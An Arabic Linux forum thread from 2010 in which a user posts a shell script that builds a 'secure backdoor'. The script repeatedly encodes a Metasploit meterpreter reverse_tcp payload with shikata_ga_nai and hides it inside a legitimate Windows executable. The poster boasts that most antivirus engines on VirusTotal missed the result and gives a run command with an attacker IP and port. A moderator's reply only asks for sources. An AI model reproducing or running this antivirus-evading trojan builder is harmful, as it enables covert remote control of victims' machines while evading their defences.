صنع Secure BackDoor

احمد الشمري

لينكساوي

تاريخ التسجيل: May 2009
المشاركات: 177

[سكربت] صنع Secure BackDoor

08-06-2010, 11:59 PM

بسم الله الرحمن الرحيم

سكربت جميل وسهل لصنع باكدوور مشفر عن برامج مضادات الفيروسات ويتميز أنه يتيح لك تشفير الباكدوور أكثر من مرّة لإخفاءه أكثر

جربت فحص الباكدوور المشفر في موقع VirusTotal وأظهر نتائج مرضيه فلم يكتشفه أغلب برامج مضادات الفيروسات مثل كاسبرسكي وأفاست و AVG والنود32 ومكافي وسيمانتيك

كود السكربت:

كود:

[SIZE=3]#!/bin/sh[/SIZE]
[SIZE=3] # (C)opyright 2010 - pigtail23[/SIZE]
[SIZE=3] # AVbypass Creator v. 1.0 (2010-06-06)[/SIZE]
[SIZE=3] #msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x -->>> /pentest/windows-binaries/tools/tftpd32.exe <<<-- -t exe > $4$c.exe[/SIZE]
[SIZE=3] #/pentest/windows-binaries/tools/tftpd32.exe <--- you can use a file of your choise[/SIZE]

[SIZE=3] echo "sh avbypass.sh <IP> <Port> <Number of times to encode> <Filename>"[/SIZE]

[SIZE=3] if [[  $1 ]]; then echo "IP:" $1 ; else echo "IP not set"; exit 0; fi[/SIZE]
[SIZE=3] if [[  $2 ]]; then echo "Port:" $2 ; else echo "Port not set"; exit 0; fi[/SIZE]
[SIZE=3] if [[  $3 ]]; then echo "Number:" $3 ; else echo "Set Number"; exit 0; fi[/SIZE]
[SIZE=3] if [[  $4 ]]; then echo "Filename:" $4 ; else echo "Set Filename"; exit 0; fi[/SIZE]
[SIZE=3] echo "File/-s creating. Pls Wait..."[/SIZE]

[SIZE=3] for (( c=1; c<=$3; c++ ))[/SIZE]
[SIZE=3] do[/SIZE]

[SIZE=3]     msfpayload windows/meterpreter/reverse_tcp LHOST=$1 LPORT=$2 R | msfencode -c $c -e x86/shikata_ga_nai -x /pentest/windows-binaries/tools/tftpd32.exe -t exe > $4$c.exe[/SIZE]

[SIZE=3] echo "File" $4$c".exe was created."[/SIZE]

[SIZE=3] done[/SIZE]

احفظه بأي محرر نصوص وسمه بأي اسم وليكن encoder.sh وشغله بواسطة الأمر:
sh encoder.sh 192.168.1.4 2222 4 /root/SBD
192.168.1.4=آي بي المخترق
2222=المنفذ الذي سيتم الاتصال منه
4=عدد مرات التشفير
/root/SBD=المسار الذي سيتم صنع الباكدور فيه و اسم الباكدوور

يمكن تحميل السكربت من هنا

ubuntu
أوبنتو سنتر - عالم أوبنتو

الكلمات الدلالية (Tags): لا يوجد

Tizemt

.: مشرف سابق :.

تاريخ التسجيل: Jun 2008

المشاركات: 865
- مشاركة
- تويت
#2

09-06-2010, 06:45 PM

السلام عليكم ورحمة الله
مواضيع رائعة منك اخي احمد بارك الله فيك
حبذا لو تذكر المصادر اخي للامانة العلمية

المصدر الاصلي للموضوع

http://www.backtrack-linux.org/forums/backtrack-howtos/29230-script-4-av-bypass-meterpreters.html

مصدر اخر مترجم الى البرتغالية

http://www.backtrack-linux.org/forums/tutoriais-e-howtos/29272-script-4-av-bypass-meterpreters.html

دمتم بخير

+ إحصل على مساعدة فورية في قناة مجتمع اللينكس العربي.
+ إب حث في المحرك الخاص بنا قبل إعتماد أي موضوع.
- لماذا يقول لنا مشرفوا وأعضاء وإدارة المجتمع (هلا بحثت؟)
+ إستعمل التولبار الخاص بنا لتسهيل متابعتنا.

إعلم أخي أنه لا يوجد سر للنجاح. إنما النجاح نتيجة التنظيم، العمل الجاد و التعلم من الأخطاء.
تعليق

إعـــــــلان

[سكربت] صنع Secure BackDoor

تعليق